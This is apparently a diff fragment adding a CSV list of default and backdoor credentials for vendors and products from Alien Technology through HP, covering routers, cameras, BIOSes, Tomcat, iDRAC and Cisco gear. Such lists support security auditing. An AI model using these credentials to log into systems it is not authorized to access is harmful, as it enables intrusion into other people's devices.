+Alien Technology,root,alien +A-Link,admin, +allied,, +Allied Telesyn,admin, +Allied Telesyn,,admin +Allied Telesyn,,manager +Allied Telesyn,manager,admin +Allied Telesyn,manager,friend +Allied Telesyn,manager,manager +Allied Telesyn,root, +Allied Telesyn,secoff,secoff +Allnet,admin,admin +ALLNET,admin,admin +ALLNET,admin,password +ALLNET,,admin +Allot,admin,allot +Allot,root,bagabu +Alteon,admin,admin +Alteon,admin, +Alteon,admin,linga +Altova,root,root +Ambit,root, +Ambit,root,root +Ambit,user,user +Amcrest,admin,admin +American Dynamics EDVR (telnet),admin,9999 +american_dynamics (web),admin,9999 +american_dynamics (web),admin,admin +AMI,,aammii +AMI,,AM +AMI,,A.M.I +AMI,,AMI +AMI,,AMI~ +AMI,,AMIAMI +AMI,,AMIDECOD +AMI,,AMI.KEY +AMI,,AMI.KEZ +AMI,,AMIPSWD +AMI,,AMISETUP +AMI,,AMI!SW +AMI,,AMI?SW +AMI,,AMI_SW +AMI,,BIOSPASS +AMI,,CMOSPWD +AMI,,HEWITT RAND +Amigo,admin,epicrouter +Amino,,leaves +Amino,,snake +Amitech,admin,admin +AmpJuke,admin,pass +Amptron,,Polrty +AMX,admin,1988 +AMX,Admin,1988 +AMX,admin,admin +AMX,administrator,password +AMX,Administrator,vision2 +AMX,,1988 +AMX,,admin +AMX,, +AMX,guest,guest +AMX,NetLinx,password +AMX,root,mozart +Andover Controls,acc,acc +Anevia,admin,paris +Anevia,monitor,anevia +antsle (ssh),root,antsle +AOC,,admin +Apache,admin,admin +Apache,admin, +Apache,admin,j5Brn9 +APACHE,admin,jboss4 +Apache,admin,tomcat +Apache,both,tomcat +Apache Project,jj, +Apache,role1,role1 +Apache,role1,tomcat +Apache,role,changethis +Apache,root,changethis +Apache,root,root +Apache,tomcat,changethis +Apache Tomcat Host Manager (web),admin,admin +Apache Tomcat Host Manager (web),ADMIN,ADMIN +Apache Tomcat Host Manager (web),admin, +Apache Tomcat Host Manager (web),admin,j5Brn9 +Apache Tomcat Host Manager (web),admin,tomcat +Apache Tomcat Host Manager (web),cxsdk,kdsxc +Apache Tomcat Host Manager (web),j2deployer,j2deployer +Apache Tomcat Host Manager (web),ovwebusr,OvW*busr1 +Apache Tomcat Host Manager (web),QCC,QLogic66 +Apache Tomcat Host Manager (web),role1,role1 +Apache Tomcat Host Manager (web),role1,tomcat +Apache Tomcat Host Manager (web),role,changethis +Apache Tomcat Host Manager (web),root,root +Apache Tomcat Host Manager (web),tomcat,changethis +Apache Tomcat Host Manager (web),tomcat,s3cret +Apache Tomcat Host Manager (web),tomcat,tomcat +Apache Tomcat Host Manager (web),xampp,xampp +APC,(any),TENmanUFactOryPOWER +APC,apc,apc +APC,,backdoor +APC,,serial number of the Call-UPS +APC,,serial number of the Share-UPS +APC,,TENmanUFactOryPOWER +APC,device,apc +APC,device,device +APC Network Management Card (web),apc,apc +APC Network Management Card (web),device,apc +APC Network Management Card (web),readonly,apc +APC,POWERCHUTE,APC +APC,readonly,apc +APC SmartSlot (snmp),,TENmanUFactOryPOWER +APC UPS (web),apc,apc +Apple,admin,public +Apple,,admin +Apple,,password +Apple,,public +Apple,,xyzzy +Apple Computer,,public +Apple Computer,,xyzzy +Apple Jailbroken Device (ssh),root,alpine +Apple Jailbroken Device (ssh),root,dottie +Apple,mobile,dottie +Apple,root,admin +Apple,root,alpine +Applied Innovations,scout,scout +Areca,admin,0 +arecont (web),admin, +arecont (web),, +Arescom,,atc123 +Aris (mssql),ARIS9,*ARIS!1dm9n# +Arlotto,admin,123456 +Arris,admin,password +Arrowpoint,admin,system +Arrowpoint,, +ARtem,,admin +Aruba,admin,admin +Aruba (web),admin,admin +Arun,123,234 +Asante,admin,asante +Asante,IntraStack,Asante +Asante,IntraSwitch,Asante +Asante,superuser,asante +Asante,superuser, +Ascend,,ascend +Ascend,readonly,lucenttech2 +Ascend,readwrite,lucenttech1 +Ascend,root,ascend +Ascom,,3ascotel +ASMAX,admin,epicrouter +asmax (ssh),admin,admin +asmax (ssh),support,support +asmax (ssh),user,user +Aspect,customer, +Aspect,DTA,TJM +ast,, +AST,,SnuFG5 +Asterisk,Admin,admin +Asus,admin,admin +Asus,adsl,adsl1234 +Asus,,admin +asus (ssh),admin,admin +asus (ssh),Admin,Admin +asus (ssh),admin,password +asus (ssh),root,root +ATCOM,admin,admin +ATCOM,admin, +ATCOM,user, +Atlantis,admin,atlantis +Atlassian Confluence,disabledsystemuser,disabled1system1user6708 +Atlassian,crowd-openid-server,password +Atlassian,Crowd,password +Atlassian,Demo,password +Atlassian,Username,password +ATL,operator,1234 +ATL,Service,5678 +Atrie,admin,password +Attachmate,,PASSWORD +AT&T Arris NVG589 & NVG599 (SharknAT&To) (ssh),remotessh,5SaP9I26 +AT&T,,mcp +ATX,atx,atx +Audioactive,,telos +AudioCodes Mediant 1000 (web),Admin,Admin +Autodesk,autocad,autocad +Avaya,admin,admin +Avaya,admin,admin123 +Avaya,admin,barney +Avaya,Administrator,ggdaseuaimhrke +Avaya,admin,password +Avaya,,admin +Avaya,, +Avaya,,Craftr4 +Avaya Contact Center (web),webadmin,webadmin +Avaya,craft, +Avaya,craft,crftpw +Avaya,Craft,crftpw +Avaya,dadmin,dadmin +Avaya,dadmin,dadmin01 +Avaya,diag,danger +Avaya,manuf,xxyyzz +Avaya,root,cms500 +Avaya,root,ggdaseuaimhrke +Avaya,root,root +Avaya,root,ROOT500 +Avenger News System (ANS),,Administrative +avigilon (web),admin,admin +avigilon (web),Administrator, +AVM,,0 +AVM,, +Avocent,root,tslinux +avtech (web),admin,admin +Award,,1322222 +AWARD,,1322222 +Award,,256256 +AWARD,,256256 +AWARD,,589589 +AWARD,,589721 +Award,,admin +AWARD,,admin +Award,,alfarome +AWARD,,alfarome +Award,,aLLy +AWARD,,aLLy +Award,,aPAf +AWARD,,aPAf +Award,,?award +Award,,award +AWARD,,?award +AWARD,,award_? +AWARD,,Award +AWARD,,award_ps +AWARD,,AWARD_PW +Award,,AWARD_SW +AWARD,,award.sw +AWARD,,AWARD SW +AWARD,,AWARD?SW +AWARD,,AWARD_SW +Award,,awkward +AWARD,,awkward +Award,,BIOS +AWARD,,BIOS +Award,,biosstar +AWARD,,biosstar +Award,,biostar +AWARD,,biostar +AWARD,, +Award,,CONCAT +AWARD,,CONCAT +Award,,CONDO +AWARD,,condo +AWARD,,djonet +AWARD,,efmukl +Award,,g6PJ +AWARD,,g6PJ +Award,,h6BB +AWARD,,h6BB +Award,,HELGA-S +AWARD,,HELGA-S +Award,,HEWITT RAND +AWARD,,HEWITT RAND +Award,,HLT +AWARD,,HLT +Award,,j09F +AWARD,,j09F +Award,,j256 +AWARD,,j256 +Award,,j262 +AWARD,,j262 +Award,,j322 +AWARD,,j322 +Award,,j64 +AWARD,,j64 +Award,,lkw peter +Award,,lkwpeter +AWARD,,lkw peter +AWARD,,lkwpeter +Award,,PASSWORD +AWARD,,PASSWORD +Award,,SER +AWARD,,SER +Award,,setup +AWARD,,setup +Award,,SKY_FOX +AWARD,,SKY_FOX +AWARD,,SW_AWARD +Award,,SWITCHES_SW +AWARD,,SWITCHES_SW +Award,,Sxyz +AWARD,,Sxyz +Award,,SY_MB +Award,,SZYX +AWARD,,SZYX +Award,,t0ch20x +AWARD,,t0ch20x +Award,,t0ch88 +AWARD,,t0ch88 +Award,,TTPTHA +AWARD,,TTPTHA +Award,,TzqF +AWARD,,TzqF +Award,,wodj +AWARD,,wodj +AWARD,,ZAAADA +Award,,zbaaaca +AWARD,,zbaaaca +AWARD,,zjaaadc +Axis,, +Axis Communications,root,pass +Axis,root,pass +axis (web),root,admin +axis (web),root,pass +AXUS,,0 +Axway,setup,setup +Aztech,admin,admin +Aztech,isp,isp +Aztech,root,admin +backtrack,root,toor +Barco,admin,admin +Barco,,clickshare +Barracuda,admin,admin +Barracuda,ssladmin,ssladmin +Barracuda (web),admin,admin +Barracuda (web),ssladmin,ssladmin +basler (web),admin,admin +Bausch Datacom,admin,epicrouter +Bay Networks,,NetICs +Bay Networks,Manager, +Bay Networks,security,security +Bay Networks,User, +BBR-4MG and,root, +BEA,system,weblogic +BECU,musi1921,Musii%1921 +Beef-xss,beef,beef +Beetel,admin,admin +Beetel,admin,password +Belkin,admin, +Belkin,,admin +Belkin,,MiniAP +Benq,admin,admin +BestPractical,root,password +Best Practical Solutions,root,password +Bewan,bewan,bewan +bhu (ssh),admin,admin +Billion,admin,admin +Billion,, +billion (ssh),admin,admin +Bintec,admin,bintec +BinTec,admin,bintec +Bintec,admin,funkwerk +BinTec,Admin,No +BinTec,,snmp-Trap +Biodata,,Babylon +Biodata,config,biodata +Biostar,,Biostar +Biostar,,Q54arwms +Biscom,admin,admin +BizDesign,Admin,ImageFolio +BLACKBOX,Administrator,public +Black Widow Web Design Ltd,admin,nimda +Blaeri,Blaeri,22332323 +Blitzz Technologies,admin,admin +Bloodhound,neo4j,BloodHound +Bloodhound,neo4j,neo4j +Bluecoat,admin,admin +Blue Coat Systems,admin,articon +BMC,patrol,patrol +BMC Software,Administrator,the same all over +BMC Software,Best1_User,BackupU$r +BNI,USER,USER +Bomgar,admin,password +Borland,, +Borland,politically,correct +Bosch,live,live +Bosch RPS (mssql),sa,RPSsql12345 +Bosch,service,service +Bosch,user,user +boson,, +Breezecom,, +Breezecom,,Helpdesk +Breezecom,,laflaf +Breezecom,,Master +Breezecom,,Super +brickcom (web),admin,admin +Broadlogic,admin,admin +Broadlogic,installer,installer +Broadlogic,webadmin,webadmin +Brocade,admin,brocade1 +Brocade,admin,password +Brocade,factory,Fact4EMC +Brocade,root,fibranne +Brocade,root,fivranne +Brocade,root,Serv4EMC +Brocade,user,password +Brother,admin,access +Brother,,access +Brother HL Series (printer),admin,access +Brother Industries Ltd.,admin,access +Brother Industries Ltd.,,00000000 +Brother Industries Ltd.,,12345678 +BT,admin,admin +Buffalo/MELCO,root, +Buffalo,root, +Buffalo Technology,admin,password +Busybox,admin,admin +CA APM Team Center (web),Admin, +CA APM Team Center (web),Guest,Guest +Cable And Wireless,admin,1234 +Cabletron,, +Cabletron,netman, +caldera,admin,admin +CA NetQoS (web),nqadmin,nq +CA NetQoS (web),nquser,nq +Canon,,0 +Canon/Brother,7654321,7654321 +canon (web),root,camera +canyon,Administrator,admin +Capricorn Infotech India,,1234567890 +CA Process Automation,pamadmin,pamadmin +CareStream Health,KeyOperator,DV5800 +CareStream Health,LocalService,DV5800 +Carsten Schmitz,admin,password +Cayman,admin, +Cayman,admin,(serial number) +Cayman,}, +Cayman,, +CCH (mssql),sa,PracticeUser1 +Celerity,mediator,mediator +Celerity,root,Mua'dib +Cellit,cellit,cellit +Centreon WebUI,admin,centreon +Ceragon Networks,root,tooridu +CGI World,,protection +Chase Research,,iolan +Checkpoint,admin,abc123 +Checkpoint,admin,admin +Check Point,admin,admin +Check Point,admin,adminadmin +Checkpoint (web),admin,abc123 +Checkpoint (web),admin,admin +ChillyCMS,jens,demo +Christie,admin,admin +Chuming Chen,administrator,adminpass +CIK Telecom,User,cikvoip +Ciphertrust,admin,password +CipherTrust,admin,password +Cisco,admin,admin +Cisco,admin, +Cisco,admin,changeme +Cisco,admin,cisco +Cisco,admin,default +Cisco,admin,diamond +Cisco,Administrator,admin +Cisco,Administrator,changeme +Cisco,admin,localadmin +Cisco,admin,tsunami +Cisco Aironet (ssh),Cisco,Cisco +Cisco-Arrowpoint,admin,system +Cisco,bbsd-client, +Cisco,bbsd-client,changeme2 +Cisco,, +Cisco,,c +Cisco,,cable-docsis +Cisco,,cc +Cisco,,changeit +Cisco,,cisco +Cisco,,_Cisco +Cisco,,Cisco +Cisco,,Cisco router +Cisco,,ILMI +Cisco,,letmein +Cisco,,public/private/secret +Cisco,,riverhead +Cisco,bubba,(unknown) +Cisco,CISCO15,otbu+1 +Cisco,cisco, +Cisco,cisco,cisco +Cisco,Cisco,Cisco +Cisco,cmaker,cmaker +Cisco Collaboration Endpoint (general),cisco,admin +Cisco,EAdmin, +Cisco,enable, +Cisco,enable,cisco +Cisco,End User,7936 +Cisco,ESubscriber, +Cisco Guard (snmp),,riverhead +Cisco,guest, +Cisco,hsa,hsadb +Cisco,netrangr,attack +Cisco,pnadmin,pnadmin +Cisco,praisenetwork,perfectpraise +Cisco,private ReadWrite access,secret +Cisco,public ReadOnly access,secret +Cisco,ripeop, +Cisco,root,attack +Cisco,root,blender +Cisco,root,Cisco +Cisco,root,password +Cisco,root,secur4u +Cisco,sa, +Cisco,scpuser,scpuser +Cisco (ssh),cisco,cisco +Cisco (ssh),pix,cisco +Cisco Systems (general),cisco,cisco +Cisco,technician,2 + last 4 of Audio +Cisco,UAMIS_, +Cisco,UNITY_, +Cisco,UOMNI_, +Cisco,UVPIM_, +Cisco,uwmadmin,password +Cisco,wlseuser,wlsepassword +Cisco,wlse,wlsedb +Citel,,citel +Citel,citel,password +Citrix Systems (web),nsroot,nsroot +Citrix Systems (web),root,rootadmin +Claris,,familymacintosh +ClearOne Communications,clearone,converge +ClearOne Communications,ClearOne,RAV +ClearPass (general),admin,eTIPS123 +CMSimple,,test +CNET,admin,1234 +CNet,Admin,admin +Cnet,Admin,epicrouter +Cnet,admin,password +Cobalt,admin,admin +Colubris,admin,admin +Colubris Networks,admin,admin +COM3,admin,admin +Comcast Home Networking,comcast, +Comcast SMC,cusadmin,CantTouchThis +Comcast SMC,cusadmin,highspeed +Comersus,admin,dmr99 +Comodo Group,mydlp,mydlp +Compaq,administrator,administrator +Compaq,anonymous, +Compaq,, +Compaq,,Compaq +Compaq,operator,operator +Compaq,PFCUser,240653C9467E45 +Compaq,root,manager +Compaq,root,rootme +Compaq,user,public +Compaq,user,user +Compualynx,administrator,asecret +Comtrend,admin,1234 +Comtrend,admin,admin +Comtrend,admin, +comtrend (ssh),admin,admin +Conceptronic,admin,1234 +Conceptronic,admin,password +Conceptronic,anonymous,password +Concord,,last +Conexant,admin,amigosw1 +Conexant,admin,conexant +Conexant,admin,epicrouter +Conexant,Administrator,admin +Conexant,admin,password +Conexant,,admin +Conexant,,epicrouter +Conitec,Adam,29111991 +Control4,,ducati900ss +Control4,root,t0talc0ntr0l4! +Corecess,admin, +Corecess,Administrator,admin +Corecess,corecess,corecess +CoronaMatrix,admin,admin +Couchdb,admin,password +Covertix,Admin,Admin +Creative,, +Crossbeam,,x40rocks +crt,egcr,ergc +Crystalview,,Crystal +CTX International,,CTX_123 +cuproplus,, +cyberguard,cgadmin,cgadmin +Cyberguard,cgadmin,cgadmin +CyberMax,,Congress +CyberPower,cyber,cyber +CyberPower,device,cyber +CyberSentry,Administrator,ChangeMe1# +Cyclades,root, +Cyclades,root,tslinux +Cyclades,super,surt +D9287ar,Clarissa, +Daewoo,,Daewuu +Dallas Semiconductors,root,tini +darkman,ioFTPD,ioFTPD +Dassault Systemes,Test Everything, +Datacom,,letmein +Datacom,sysadm,sysadm +Data General,operator,operator +Data General,op,op +Data General,op,operator +DataStax OpsCenter 6.0.x (web),admin,admin +Datawizard.net,anonymous,any +Datawizard.net,anonymous,any@ +DataWizard Technologies Inc.,anonymous, +DataWizard Technologies Inc.,test,test +Davolink,user,user +Davox,admin,admin +Davox,davox,davox +Davox,root,davox +Davox,sa, +Daytek,,Daytec +db2 (db2),ADONIS,BPMS +db2 (db2),dasusr1,dasusr1 +db2 (db2),db2admin,db2admin +db2 (db2),db2fenc1,db2fenc1 +db2 (db2),db2inst1,db2inst1 +db2 (db2),db2inst1,db2pass +db2 (db2),db2inst1,db2password +db2 (db2),db2inst1,db2pw +Debian,,tatercounter2000 +decnet,operator,admin +Deerfield,MDaemon,MServer +DEFENDER®,admin,123456 +Dell,admin,admin +Dell,Admin, +Dell,Administrator,storageserver +Dell,admin,password +Dell,,1RRWTTOOI +Dell,,admin +Dell,,Dell +Dell,,Fireport +Dell,,nz0u4bbe +DELL IDARC (web),root,calvin +Dell iDRAC (web),root,calvin +Dell,rapport,r@p8p0r+ +Dell,root,calvin +Dell,root,wyse +Dell,VNC,winterm +Demarc,admin,my_DEMARC +Deutsche Telekom,admin, +Deutsche Telekom,,0 +Develcon,,BRIDGE +Develcon,,password +Dictaphone,NETOP, +Dictaphone,NETWORK,NETWORK +Dictaphone,PBX,PBX +digicom,Admin, +Digicom,admin,michelangelo +DIGICOM,root,admin +Digicom,user,password +Digicorp,,BRIDGE +Digicorp,,password +Digicraft Software,Yak,asd123 +Digital Equipment,1.1,SYSTEM +Digital Equipment,1,manager +Digital Equipment,1,operator +Digital Equipment,1,syslib +Digital Equipment,2,maintain +Digital Equipment,2,manager +Digital Equipment,2,operator +Digital Equipment,2,syslib +Digital Equipment,30,games +Digital Equipment,5,games +Digital Equipment,7,maintain +Digital Equipment,accounting,accounting +Digital Equipment,ALLIN1,ALLIN1 +Digital Equipment,ALLIN1MAIL,ALLIN1MAIL +Digital Equipment,ALLINONE,ALLINONE +Digital Equipment,BACKUP,BACKUP +Digital Equipment,BATCH,BATCH +Digital Equipment,,1 +Digital Equipment,,access +Digital Equipment,,ACCESS +Digital Equipment,,komprie +Digital Equipment,,system +Digital Equipment,,SYSTEM +Digital Equipment,boss,boss +Digital Equipment,DCL,DCL +Digital Equipment,DECMAIL,DECMAIL +Digital Equipment,DECNET,DECNET +Digital Equipment,DECNET,NONPRIV +Digital Equipment,DEFAULT,DEFAULT +Digital Equipment,DEFAULT,USER +Digital Equipment,demo,demo +Digital Equipment,DEMO,DEMO +Digital Equipment,FIELD,DIGITAL +Digital Equipment,FIELD,FIELD +Digital Equipment,FIELD,SERVICE +Digital Equipment,FIELD,TEST +Digital Equipment,GUEST,GUEST +Digital Equipment,HELPDESK,HELPDESK +Digital Equipment,HELP,HELP +Digital Equipment,HOST,HOST +Digital Equipment,INFO,INFO +Digital Equipment,INGRES,INGRES +Digital Equipment,LINK,LINK +Digital Equipment,MAILER,MAILER +Digital Equipment,manager,manager +Digital Equipment,MBMANAGER,MBMANAGER +Digital Equipment,MBWATCH,MBWATCH +Digital Equipment,NETCON,NETCON +Digital Equipment,NETMGR,NETMGR +Digital Equipment,NETNONPRIV,NETNONPRIV +Digital Equipment,NETPRIV,NETPRIV +Digital Equipment,NETSERVER,NETSERVER +Digital Equipment,NETWORK,NETWORK +Digital Equipment,NEWINGRES,NEWINGRES +Digital Equipment,NEWS,NEWS +Digital Equipment,OPERVAX,OPERVAX +Digital Equipment,PDP11,PDP11 +Digital Equipment,PDP8,PDP8 +Digital Equipment,POSTMASTER,POSTMASTER +Digital Equipment,PRIV,PRIV +Digital Equipment,REPORT,REPORT +Digital Equipment,RJE,RJE +Digital Equipment,software,software +Digital Equipment,STUDENT,STUDENT +Digital Equipment,SYSMAINT,DIGITAL +Digital Equipment,SYSMAINT,SERVICE +Digital Equipment,SYSMAINT,SYSMAINT +Digital Equipment,SYS,SYS +Digital Equipment,SYSTEM,MANAGER +Digital Equipment,SYSTEM,OPERATOR +Digital Equipment,SYSTEM,SYSLIB +Digital Equipment,SYSTEM,SYSTEM +Digital Equipment,SYSTEST_CLIG,SYSTEST +Digital Equipment,SYSTEST_CLIG,SYSTEST_CLIG +Digital Equipment,SYSTEST,UETP +Digital Equipment,TELEDEMO,TELEDEMO +Digital Equipment,TEST,TEST +Digital Equipment,UETP,UETP +Digital Equipment,USER,PASSWORD +Digital Equipment,USERP,USERP +Digital Equipment,USER,USER +Digital Equipment,VAX,VAX +Digital Equipment,VMS,VMS +Digitus,admin,1234 +Digium Inc,admin,password +Ditto Forensic FieldStation,ditto,ditto +Divar,admin, +Divar,viewer, +DJI (OSMO),,12341234 +Dlink,admin,admin +D-Link,admin,admin +Dlink,admin, +D-Link,admin, +D-Link,Admin, +D-Link,admin,gvt12345 +D-Link,admin,password +Dlink,admin,public +D-Link,admin,public +D-Link,admin,year2000 +D-Link,Alphanetworks,wrgg15_di524 +D-Link,,admin +D-Link,, +D-Link,,private +D-Link,,public +D-Link DIR845L,Alphanetworks,wrgnd21_dlob.hans_dir845 +D-Link,D-Link,D-Link +D-Link,dont need one,admin +D-Link,root,admin +D-Link,user, +Dlink (web),1234,1234 +Dlink (web),admin,admin +Dlink (web),root,12345 +Dlink (web),root,root +DMP V-4022C,admin, +DMP V-4052D,admin, +DMP V-4072MD,admin, +DMP V-5012B,scwuser,scw12345user +DMP V-5014B,scwuser,scw12345user +DMP V-5052D,scwuser,scw12345user +DMP V-5054D,scwuser,scw12345user +DotNetNuke Corporation,admin,dnnadmin +DotNetNuke Corporation,host,dnnhost +Draytek,admin,admin +Draytek,admin, +Draytek Corp,admin, +Draytek,draytek,1234 +Draytek,Draytek,1234 +drupal.org,admin,admin +Ducati Motor Holding,,Last 4 digits of VIN +Duhua (telnet),admin,7ujMko0admin +Duhua (telnet),root,7ujMko0admin +Duhua (telnet),root,vizxv +DuPont,root,par0t +DVB,dvstation,dvst10n +DVB,root,pixmet2003 +Dynalink,admin,admin +Dynalink,admin,private +Dynalink,userNotUsed,userNotU +Dynatrace (web),admin,admin +Dynix Library Systems,circ, +Dynix Library Systems,LIBRARY, +Dynix Library Systems,SETUP, +Easyone Connect,admin,8005 +easyWinArt (mssql),sa,$easyWinArt4 +Eaton,admin,admin +Echelon Corporation,ilon,ilon +E-Con,admin,epicrouter +Edimax,admin,123 +Edimax,admin,1234 +Edimax,admin, +Edimax,admin,epicrouter +Edimax,admin,password +Edimax,admin,su@psir +Edimax,edimax,software01 +Edimax,guest,1234 +Edimax,guest, +Efficient,,admin +Efficient,, +Efficient,login,admin +Efficient,login,password +Efficient Networks,,4getme2 +Efficient Networks,,hs7mwxkk +Efficient Networks,login,admin +Efficient,superuser,admin +Efficinet Networks,login,admin +EFront Leanring,professor,professor +EFront Learning,student,student +Ektron,builtin,builtin +Ektron,sa,Ektron +Elasticsearch (web),, +elasticsearch (web),elastic,changeme +ElkarBackup,root,root +Elron,(hostname/ipaddress),sysadmin +Elsa,, +Elsa,,cisco +Eltek,admin,admin +Eltek,user,user +eMachines,emaq,4133 +EMC,admin, +EMC,admin,changeme +EMC,backuponly,backuponly1 +EMC,backuprestore,backuprestore1 +EMC,dpn,changeme +EMC,MCUser,MCUser1 +EMC,restoreonly,restoreonly1 +EMC,root,8RttoTriz +EMC,root,changeme +EMC,viewuser,viewuser1 +Emerson,Admin,Emerson1 +Emerson AMS (mssql),sa,42Emerson42Eme +Eminent,admin,admin +enCAD,, +Endpoint Protector (general),root,epp2011 +EnGenius,admin,admin +Enhydra,admin,enhydra +Enox,,xo11nE +Enterasys,admin, +Enterasys,admin,netadmin +Enterasys,,netadmin +Enterasys,tiger,tiger123 +Entrust,admin,admin +Entrust,websecadm,changeme +EPISD,computer,repair +EPiServer AB,admin,store +Epox,,central +EPSON,EPSONWEB,admin +eQ-3,root,MuZhlo9n%8!G +Ericsson ACC,public, +Ericsson,admin,default +ericsson,, +ericsson,,help +Ericsson,expert,expert +Ericsson,MD110,help +Ericsson,netman,netman +ERNITEC,Admin,1234 +eSeSIX Computer GmbH,root,jstwo +E-Tech,admin,epicrouter +E-Tech,admin,password +E-Tech,,admin +EtroVISION,root,pass +EuroVideo,admin,00000000 +EverFocus,admin,admin +EverFocus,,11111111 +EverFocus,operator,operator +EverFocus,supervisor,supervisor +Exabyte,anonymous,Exabyte +Exacq Technologies,admin,admin256 +Exacq Technologies,user,user5710 +ExaGrid,root,inflection +Exinda Networks,admin,exinda +Extended Systems,admin,admin +Extended Systems,admin,extendnet +Extreme Networks,admin, +EyesOfNetwork (snmp),,EyesOfNetwork +EZPhotoSales,admin,admin +eZ Systems,admin,publish +F5,admin,admin +F5-Networks,, +F5,root,default +F5,support, +Fastream Technologies,root, +Fastwire,fastwire,fw +FatWire,firstsite,firstsite +FatWire,fwadmin,xceladmin +Fibaro,admin,admin +Firebird Project,SYSDBA,masterkey +Firebird,SYSDBA,masterkey +Flowpoint,admin,admin +Flowpoint,, +Flowpoint,,password +fon,admin,admin +Fortigate,admin, +Fortinet,admin, +Fortinet,,bcpb(serial number of the firewall) +Fortinet,maintainer,admin +Fortinet,maintainer,bcpb[SERIAL NO.] +Fortinet,maintainer,pbcpbn(add-serial-number) +fortinet (web),admin, +fortinet (web),maintainer,admin +fortinet (web),maintainer,bcpb+serial# +Foscam,admin, +Foundry Networks,admin,admin +Foundry Networks,, +FreeSWITCH,,ClueCon +Freetech,,Posterie +FrontRange Solutions,master,access +ftp (ftp),anonymous, +ftp (ftp),ftp,ftp +ftp (ftp),guest,guest +Fujitsu Siemens,,connect +Fujitsu Siemens,,fi-scanner +Fujitsu Siemens,manage,!manage +Funk Software,admin,radius +Galacticomm,Sysop,Sysop +Gandalf,,console +Gandalf,,gandalf +Gandalf,,system +Gandalf,,xmux +GarrettCom Magnum Switch(Web),manager,manager +Gateway,admin,admin +Geeklog,username,password +GE,museadmin,Muse!Admin +General Instruments,test,test +GeoNetwork (mssql),admin,gnos +geovision (web),admin,admin +Gericom,Administrator, +GE Security,install,install +giga,Administrator,admin +Gigabyte,admin,admin +GigaFiber,admin,jiocentrum +Gill Instruments,admin,password +Gitlab,admin,5iveL!fe +Gitlab,admin@local.host,5iveL!fe +Gitlab,root,5iveL!fe +glftpd,glftpd,glftpd +glFtpD,glftpd,glftpd +Globespan Virata,DSL,DSL +GlobespanVirata,root,root +GoAnywhere MFT,administrator,goanywhere +Google,admin,urchin +Gossamer Threads Inc.,admin,admin +Gossamer Threads Inc.,author,author +Gossamer Threads Inc.,guest,guest +Grafana (general),admin,admin +Grandstream,admin,1234 +Grandstream,admin,admin +GrandStream,Administrator,admin +GrandStream,,admin +GrandStream,End User,123 (or blank) +grandstream (web),admin,admin +Greatspeed,admin,broadband +greatspeed,netadmin,nimdaten +Groupee,Admin5,4tugboat +GuardOne,,guardone +GuardOne,n.a,guardone +Guru,admin,admin +GVC,Administrator,admin +H2O Project,admin,admin +haier,ucenik23,ucenik +Haivision Makito X Decoder (web),admin,manager +Hayes,system,isp +Heatmiser Wifi Thermostat (iot),admin,admin +Hemoco Software,lansweeperuser,mysecretpassword0* +Hewlett Packard,admin,admin +Hewlett-Packard,admin,admin +Hewlett-Packard,Admin,Admin +Hewlett-Packard,admin,hp.com +Hewlett-Packard,admin,isee +Hewlett-Packard,Administrator,The last eight digits of the serial number +Hewlett-Packard,ADVMAIL, +Hewlett-Packard,ADVMAIL,HP +Hewlett-Packard,ADVMAIL,HPOFFICE DATA +Hewlett-Packard,Anonymous, +Hewlett-Packard,, +Hewlett-Packard,,hewlpack +Hewlett-Packard,FIELD, +Hewlett-Packard,FIELD,HPONLY +Hewlett-Packard,FIELD,HPP187 SYS +Hewlett-Packard,FIELD,HPWORD PUB +Hewlett-Packard,FIELD,LOTUS +Hewlett-Packard,FIELD,MANAGER +Hewlett-Packard,FIELD,MGR +Hewlett-Packard,FIELD,SERVICE +Hewlett-Packard,FIELD,SUPPORT +Hewlett-Packard,HELLO,FIELD.SUPPORT +Hewlett-Packard,HELLO,MANAGER.SYS +Hewlett-Packard,HELLO,MGR.SYS +Hewlett-Packard,HELLO,OP.OPERATOR +Hewlett-Packard,HPSupport,badg3r5 +Hewlett-Packard,MAIL,HPOFFICE +Hewlett-Packard,MAIL,MAIL +Hewlett-Packard,MAIL,MPE +Hewlett-Packard,MAIL,REMOTE +Hewlett-Packard,MAIL,TELESUP +Hewlett-Packard,MANAGER,COGNOS +Hewlett-Packard,MANAGER,HPOFFICE +Hewlett-Packard,MANAGER,ITF3000 +Hewlett-Packard,MANAGER,SECURITY +Hewlett-Packard,MANAGER,SYS +Hewlett-Packard,MANAGER,TCH +Hewlett-Packard,MANAGER,TELESUP +Hewlett-Packard,MGE,VESOFT +Hewlett-Packard,MGR,CAROLIAN +Hewlett-Packard,MGR,CCC +Hewlett-Packard,MGR,CNAS +Hewlett-Packard,MGR,COGNOS +Hewlett-Packard,MGR,CONV +Hewlett-Packard,MGR,HPDESK +Hewlett-Packard,MGR,HPOFFICE +Hewlett-Packard,MGR,HPONLY +Hewlett-Packard,MGR,HPP187 +Hewlett-Packard,MGR,HPP189 +Hewlett-Packard,MGR,HPP196 +Hewlett-Packard,MGR,INTX3 +Hewlett-Packard,MGR,ITF3000 +Hewlett-Packard,MGR,NETBASE +Hewlett-Packard,MGR,REGO +Hewlett-Packard,MGR,RJE +Hewlett-Packard,MGR,ROBELLE +Hewlett-Packard,MGR,SECURITY +Hewlett-Packard,MGR,SYS +Hewlett-Packard,MGR,TELESUP +Hewlett-Packard,MGR,VESOFT +Hewlett-Packard,MGR,WORD +Hewlett-Packard,MGR,XLSERVER +Hewlett-Packard,OPERATOR,COGNOS +Hewlett-Packard,OPERATOR,DISC +Hewlett-Packard,OPERATOR,SUPPORT +Hewlett-Packard,OPERATOR,SYS +Hewlett-Packard,OPERATOR,SYSTEM +Hewlett-Packard,Oper,Oper +Hewlett-Packard,PCUSER,SYS +Hewlett-Packard,RSBCMON,SYS +Hewlett-Packard,SPOOLMAN,HPOFFICE +Hewlett-Packard,WP,HPOFFICE +HighPOint,RAID,hpt +hikvision (ssh),admin,12345 +HipChat Server (ssh),admin,hipchat +HiSilicon,admin, +Hitachi,,0000 +Hitachi,,0300 +Hitachi,,1900 +Honeynet Project,roo,honey +Honeynet Project,root,honey +Honeywell,LocalComServer,LCS pwd 03 +honeywell (ssh),admin,12345 +Honeywell,TPSLocalServer,TLS pwd 03 +honeywell (web),admin,1234 +Horizon DataSys,,foolproof +Hosting Controller,AdvWebadmin,advcomm500349 +HP,admin,!admin +HP,admin,admin +HP,admin, +HP,admin,isee +HP,Administrator,admin +HP,,AUTORAID +HP,, +HP,Factory,56789 +HP LaserJet 600 (printer),, +HP LaserJet No Password Legacy (printer),, +HP LaserJet No Password (printer),, +HP,root,password +HP Server Automation (web),Administrator,admin +HP Server Automation 